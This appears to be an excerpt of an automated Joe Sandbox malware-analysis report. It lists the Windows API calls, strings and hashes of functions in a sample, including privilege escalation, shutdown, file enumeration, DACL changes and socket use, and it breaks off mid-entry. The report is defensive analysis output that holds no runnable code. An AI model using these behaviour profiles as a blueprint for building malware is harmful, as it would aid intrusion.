                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 1312810259-2896544425
                                                                    • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                    • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                    • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                    • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                    • __wsplitpath.LIBCMT ref: 004038B2
                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                    • _wcscpy.LIBCMT ref: 004038C7
                                                                    • _wcscat.LIBCMT ref: 004038DC
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                      • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                      • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                    • _wcscpy.LIBCMT ref: 004039C2
                                                                    • _wcslen.LIBCMT ref: 00403A53
                                                                    • _wcslen.LIBCMT ref: 00403AAA
                                                                    Strings
                                                                    • Error opening the file, xrefs: 0042B8AC
                                                                    • _, xrefs: 00403B48
                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                    • Unterminated string, xrefs: 0042B9BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                    • API String ID: 4115725249-188983378
                                                                    • Opcode ID: 8bf970d3d4e73eefaf46aa00486e5c753340099299f1587c60ac35b3df61e9bd
                                                                    • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                    • Opcode Fuzzy Hash: 8bf970d3d4e73eefaf46aa00486e5c753340099299f1587c60ac35b3df61e9bd
                                                                    • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                    • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                    • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                    • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                    • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                    • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                    • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                    • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Timetime$Sleep
                                                                    • String ID: BUTTON
                                                                    • API String ID: 4176159691-3405671355
                                                                    • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                    • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                    • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                    • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,75701228,75701228,?,?,00000000), ref: 00442E40
                                                                    • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                    • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                    • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                      • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                                                                    • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                    • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                    • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                    • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                    APIs
                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                      • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                      • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                      • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                    • _memset.LIBCMT ref: 00445E61
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                    • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                    • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                    • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                    • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3490752873-0
                                                                    • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                    • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                    • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                    • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                    • _memset.LIBCMT ref: 0047AB7C
                                                                    • _wcslen.LIBCMT ref: 0047AC68
                                                                    • _memset.LIBCMT ref: 0047ACCD
                                                                    • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                    • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 0047AD84
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1588287285-2785691316
                                                                    • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                    • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                    • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                    • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                    • GetLastError.KERNEL32 ref: 00436504
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                    • SetSystemPowerState.KERNEL32 ref: 0043656A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 2938487562-3733053543
                                                                    • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                    • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                    • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                    • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 00436162
                                                                    • __swprintf.LIBCMT ref: 00436176
                                                                      • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                    • __wcsicoll.LIBCMT ref: 00436185
                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                    • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                    • LockResource.KERNEL32(?), ref: 004361FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                    • String ID:
                                                                    • API String ID: 2406429042-0
                                                                    • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                    • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                    • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                    • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                    • GetLastError.KERNEL32 ref: 0045D59D
                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                    • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                    • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                    • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                    APIs
                                                                    • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                    • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                    • _wcslen.LIBCMT ref: 0047AE18
                                                                    • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AFCC
                                                                    • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                    • String ID: HH
                                                                    • API String ID: 1915432386-2761332787
                                                                    • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                    • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                    • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                    • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                    • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketsocket
                                                                    • String ID:
                                                                    • API String ID: 2609815416-0
                                                                    • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                    • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                    • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                    • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                    • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                    • __wsplitpath.LIBCMT ref: 004370A5
                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                    • _wcscat.LIBCMT ref: 004370BA
                                                                    • __wcsicoll.LIBCMT ref: 004370C8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00437105
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2547909840-0
                                                                    • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                    • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                    • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                    • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                    • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                    • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
